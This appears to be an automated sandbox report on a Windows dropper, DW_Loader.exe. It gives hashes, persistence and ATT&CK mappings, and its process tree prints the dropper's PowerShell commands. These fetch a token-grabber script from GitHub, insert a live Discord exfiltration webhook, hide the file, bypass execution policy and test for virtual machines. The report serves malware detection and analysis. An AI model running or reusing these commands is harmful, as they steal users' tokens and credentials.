4c50986607e29a5a7ac6cd10bbc9a74c40c19f065ac64c437324ea193c289337

Analysis

max time kernel
26s
max time network
29s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
01/07/2023, 04:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DW_Loader.exe
Size

7.2MB
MD5

403594dfcde97ab854c28d623202bb9a
SHA1

5bf3648a98205e5d6fa877ed07878c39e2bea9b0
SHA256

4c50986607e29a5a7ac6cd10bbc9a74c40c19f065ac64c437324ea193c289337
SHA512

ab6afb040094328f33d9a79e6cb304d313a0bf7c3dd66ab791888833a2292328a8fabb8eb7a789e271de868c269e286bd9add3cd0b4ae22d379a4894e4a6c778
SSDEEP

3072:JahKyd2n31Z5GWp1icKAArDZz4N9GhbkrNEk1dp9es8HcNGfceJT:JahO5p0yN90QEcp9eskcgfcW

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1123781162368770189/WlSA8ClXCnwVQMGJ80tXCQB0RqQu9_6e2ayukQezCYyTLFqZDS3NX6MGTxlbr8yKYgtZ

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
28	4300	powershell.exe
40	3368	powershell.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	DW_Loader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	DW_Loader.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000_Classes\Local Settings	Powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
3836	Powershell.exe
3836	Powershell.exe
2576	powershell.exe
2576	powershell.exe
1336	powershell.exe
1336	powershell.exe
4300	powershell.exe
4300	powershell.exe
4056	powershell.exe
4056	powershell.exe
4244	powershell.exe
4244	powershell.exe
3368	powershell.exe
3368	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	3836	Powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	3368	powershell.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 3960 wrote to memory of 3836	3960	DW_Loader.exe	84
PID 3960 wrote to memory of 3836	3960	DW_Loader.exe	84
PID 3836 wrote to memory of 4612	3836	Powershell.exe	86
PID 3836 wrote to memory of 4612	3836	Powershell.exe	86
PID 4612 wrote to memory of 4992	4612	cmd.exe	88
PID 4612 wrote to memory of 4992	4612	cmd.exe	88
PID 4992 wrote to memory of 4188	4992	net.exe	89
PID 4992 wrote to memory of 4188	4992	net.exe	89
PID 4612 wrote to memory of 4136	4612	cmd.exe	90
PID 4612 wrote to memory of 4136	4612	cmd.exe	90
PID 4612 wrote to memory of 232	4612	cmd.exe	91
PID 4612 wrote to memory of 232	4612	cmd.exe	91
PID 4612 wrote to memory of 2576	4612	cmd.exe	92
PID 4612 wrote to memory of 2576	4612	cmd.exe	92
PID 4612 wrote to memory of 1336	4612	cmd.exe	94
PID 4612 wrote to memory of 1336	4612	cmd.exe	94
PID 4612 wrote to memory of 452	4612	cmd.exe	95
PID 4612 wrote to memory of 452	4612	cmd.exe	95
PID 452 wrote to memory of 4448	452	net.exe	96
PID 452 wrote to memory of 4448	452	net.exe	96
PID 4612 wrote to memory of 4300	4612	cmd.exe	97
PID 4612 wrote to memory of 4300	4612	cmd.exe	97
PID 4612 wrote to memory of 4056	4612	cmd.exe	98
PID 4612 wrote to memory of 4056	4612	cmd.exe	98
PID 4612 wrote to memory of 4644	4612	cmd.exe	99
PID 4612 wrote to memory of 4644	4612	cmd.exe	99
PID 4612 wrote to memory of 4244	4612	cmd.exe	100
PID 4612 wrote to memory of 4244	4612	cmd.exe	100
PID 4612 wrote to memory of 3368	4612	cmd.exe	102
PID 4612 wrote to memory of 3368	4612	cmd.exe	102
PID 3368 wrote to memory of 4536	3368	powershell.exe	103
PID 3368 wrote to memory of 4536	3368	powershell.exe	103
PID 4536 wrote to memory of 220	4536	csc.exe	104
PID 4536 wrote to memory of 220	4536	csc.exe	104

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4644	attrib.exe

C:\Users\Admin\AppData\Local\Temp\DW_Loader.exe
"C:\Users\Admin\AppData\Local\Temp\DW_Loader.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3960
- C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command "Copy-Item main.bat -Destination $env:TEMP\main.bat -Force ; Start-Process -FilePath $env:TEMP\main.bat -Verb RunAs -Wait ; Remove-Item $env:TEMP\main.bat -Force"
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3836
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\main.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4612
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4992
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4188
  - - C:\Windows\system32\findstr.exe
      findstr /i "echo" "C:\Users\Admin\AppData\Local\Temp\main.bat"
      4⤵
      PID:4136
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1336
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:452
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/KDot227/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1123781162368770189/WlSA8ClXCnwVQMGJ80tXCQB0RqQu9_6e2ayukQezCYyTLFqZDS3NX6MGTxlbr8yKYgtZ' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$VM=Get-WmiObject -Class Win32_ComputerSystem ; if ($VM.Model -match 'Virtual') { Write-Host 'Virtual Machine Detected. Exiting script.' ; taskkill /F /IM cmd.exe }"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4056
  - - C:\Windows\system32\attrib.exe
      attrib +h +s powershell123.ps1
      4⤵
      Views/modifies file attributes
      PID:4644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3368
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z1p0zy54\z1p0zy54.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4536
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE89.tmp" "c:\Users\Admin\AppData\Local\Temp\z1p0zy54\CSC4485498F5A784A09AE5392D69C938AF.TMP"
        6⤵
        
        PID:220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a285423309193b2724d32ccdaf3223e7

SHA1
6ecbf56fe6fe9609399b1a0f4bf04b3775ce0d28

SHA256
0c1d44d56a79461199b142ecd3d3d52c23953785ddb0157f7ad210e35c923ec7

SHA512
09baa328dd39cb4839a11b5f4fea5b6dabb4cf77fa9c633e05606e7ebb288c2f5b7fb701a06431d9701d6bee117da2fb6e34228cdd77bc210fadad349a43af8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a9ebf2f08f166f04f651eb89437e3caf

SHA1
a5dfe7a0bfc8b9a7716147cf4849def541cdffec

SHA256
ff048c8bc793e20c4e1508a104f84dfd6485b9f1d447c0641065872ecd90ac59

SHA512
f5cae2c52f998f9b4123a16a9a3705c798dac4f2a06dea04d6da17c4bf5682fc885a4879c156f513fe792da8ea893bca7cb92440aa49036a880d774b4490b9ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1016B

MD5
5869adc207b7159992ab8ae57ed4797d

SHA1
f53c59d49fdf0850378954af8f37b16d096cae15

SHA256
0b9d552e17c213512cbfe63cb67e6430069b1de25c603d2712004dcc74b4b4bd

SHA512
7a271e1793e1621d434341aa7888f36077c29d24c149a7d30b6a9f7c468f2891b9a5ee6e10b98be187f9c24e56f62b79588ecfb8a06b1e8f6e7b282b81fe287e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kdotDymMeF.bat

Filesize
166B

MD5
316af694a7d32cfe4616a0ad875cf357

SHA1
688862f38621d75ba88cc59ecbb3583cb7fc14eb

SHA256
7b64676bd0c4fe0f1a0291ba9d2985766ff32fdcd84c048618506f67b2aac75e

SHA512
6b2ed7f9c17c9495af13e63cc3297e6383d3ec94d150848d4a967cb9e32bb88896806cac5873ebfbb1c3fb677d6a687399d71982842ab79ec1f0a35aab2f531f

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\main.bat

Filesize
1.0MB

MD5
7118138b31b6d564a676f35cd4d29a9e

SHA1
41c4a3e5c6e98efb7287cfeb7b9f0f27c383fab0

SHA256
218a5a4de627c07c59180b9dc6e4e42d836f48695b767cd29cc77b23507faeb7

SHA512
955bd364d1a3018a926fca40390473fc81fe9f699c76b41dd5450a3c7b91277e40423532cd18c6dcbb06d16eae832f91a011684554e3341fe8ceebd2f2ef3000

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFE89.tmp

Filesize
1KB

MD5
4cc568fe94f74071e2de7fe7d18bcd12

SHA1
18c6ce8262cd9a1c35419f321565b1714cf2d72e

SHA256
39e28959cd23c737d492e6e755b23435d5ff11d01becf96f4d2ce2acfc7ceab8

SHA512
142cfd68d874e365a542443f3390e179436c99790e2a6e63f50db6e36d1adf4eca5fc19706356cc119ae48d725476d9b145f8031cd5989381e249d3a51701758

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ne4ioqcc.sie.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\main.bat

Filesize
1.0MB

MD5
7118138b31b6d564a676f35cd4d29a9e

SHA1
41c4a3e5c6e98efb7287cfeb7b9f0f27c383fab0

SHA256
218a5a4de627c07c59180b9dc6e4e42d836f48695b767cd29cc77b23507faeb7

SHA512
955bd364d1a3018a926fca40390473fc81fe9f699c76b41dd5450a3c7b91277e40423532cd18c6dcbb06d16eae832f91a011684554e3341fe8ceebd2f2ef3000

Download Submit
C:\Users\Admin\AppData\Local\Temp\powershell123.ps1

Filesize
41KB

MD5
dc82396758be5cd59b9437db1ebfcef7

SHA1
9ca67b00e4239bf2ffcd413a73d01fc130bd4250

SHA256
d81991a05f3c102e85cead92a0843e1f21e222c620215c17911dade41ccb721b

SHA512
1b3cdef329e2bc13cf87e24ee653302b1cbbdce4c821283c83ad8b28390361761e1414893095c07e167569bf38d1e5de709a6ad1c8bd87c656a7e7fe7976eca8

Download Submit
C:\Users\Admin\AppData\Local\Temp\z1p0zy54\z1p0zy54.dll

Filesize
3KB

MD5
01961f186a16bc9f6e7787e8351f5dbd

SHA1
975d279124914340ff62d146a63e5a413e863821

SHA256
08cd664fec67c39744144a661e943b1c390017d968cd8cc443ed82c2fcf74648

SHA512
047b0fa0e130ab4a15f42b02df3630185bd5679b68c60c20e78539882fbae4c57eefdb7047b57873534330c113b0f638a31380d4dcb8d155b88663265f270613

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z1p0zy54\CSC4485498F5A784A09AE5392D69C938AF.TMP

Filesize
652B

MD5
16fdf016cfb839e5249651f5fa42135b

SHA1
8e171fd103dd1c3c8f256d084b02c940b0bf05b0

SHA256
35a8888040f9834b212129dd31ae6cf67d251a6d4f7d4aaf9c1a2ed0e56e66ec

SHA512
f3cf8a41d0f49b3197ec0928f16bc0d70dbbe1c11f07029809d63b00088c1d3e13a577704d1e40d4d61f8f9b6515c43e2154c511867947b22ec8ad2f4c9de923

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z1p0zy54\z1p0zy54.0.cs

Filesize
336B

MD5
016136b12c8022e3155820dd8811cf72

SHA1
27dc5ae36badef983dbda987bdb4c584659433b6

SHA256
363bc109def451724e5a8fa71b8598e7cd1ea4994622407006def7b2f67dfc56

SHA512
7055a3c610cc797f009cf7bce08febe6d90394736e86c8f4a0f13ee5b9b213649d0c0ce1288199f2aa6c38730b119c751233793f53f694badef0f577deb53c43

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\z1p0zy54\z1p0zy54.cmdline

Filesize
369B

MD5
7692ac91f33abce028ce3991526f6518

SHA1
afff1ed8cd616370ccdd31e766fabe06d0aa2723

SHA256
3779461f9e0a84f69b511b5031f18e5e37e78451c254a08badc4c902b9b2ea5e

SHA512
1c054d81888e2d55b39177b435011a35d1895a9ca6f93b60d852044e12b79f20e9aae4810e0667f7771ba19ef0239b519ea7313e45058b47015ebc3199893e2a

Download Submit
memory/2576-173-0x00000253E9E60000-0x00000253E9E70000-memory.dmp

Filesize
64KB

Download
memory/2576-172-0x00000253E9E60000-0x00000253E9E70000-memory.dmp

Filesize
64KB

Download
memory/2576-171-0x00000253E9E60000-0x00000253E9E70000-memory.dmp

Filesize
64KB

Download
memory/3368-243-0x000001F3D4700000-0x000001F3D4710000-memory.dmp

Filesize
64KB

Download
memory/3368-261-0x000001F3D6C10000-0x000001F3D6C86000-memory.dmp

Filesize
472KB

Download
memory/3368-260-0x000001F3D6BC0000-0x000001F3D6C04000-memory.dmp

Filesize
272KB

Download
memory/3368-241-0x000001F3D4700000-0x000001F3D4710000-memory.dmp

Filesize
64KB

Download
memory/3368-242-0x000001F3D4700000-0x000001F3D4710000-memory.dmp

Filesize
64KB

Download
memory/3836-249-0x0000022DEA780000-0x0000022DEA790000-memory.dmp

Filesize
64KB

Download
memory/3836-144-0x0000022DECA60000-0x0000022DECA82000-memory.dmp

Filesize
136KB

Download
memory/3836-149-0x0000022DEA780000-0x0000022DEA790000-memory.dmp

Filesize
64KB

Download
memory/3836-150-0x0000022DEA780000-0x0000022DEA790000-memory.dmp

Filesize
64KB

Download
memory/3836-251-0x0000022DEA780000-0x0000022DEA790000-memory.dmp

Filesize
64KB

Download
memory/3836-250-0x0000022DEA780000-0x0000022DEA790000-memory.dmp

Filesize
64KB

Download
memory/4056-213-0x0000027A6A560000-0x0000027A6A570000-memory.dmp

Filesize
64KB

Download
memory/4056-215-0x0000027A6A560000-0x0000027A6A570000-memory.dmp

Filesize
64KB

Download
memory/4056-214-0x0000027A6A560000-0x0000027A6A570000-memory.dmp

Filesize
64KB

Download
memory/4244-224-0x000002DAFD060000-0x000002DAFD070000-memory.dmp

Filesize
64KB

Download
memory/4244-218-0x000002DAFD060000-0x000002DAFD070000-memory.dmp

Filesize
64KB

Download
memory/4300-188-0x0000021BF30C0000-0x0000021BF30D0000-memory.dmp

Filesize
64KB

Download
memory/4300-189-0x0000021BF30C0000-0x0000021BF30D0000-memory.dmp

Filesize
64KB

Download
memory/4300-200-0x0000021BF30C0000-0x0000021BF30D0000-memory.dmp

Filesize
64KB

Download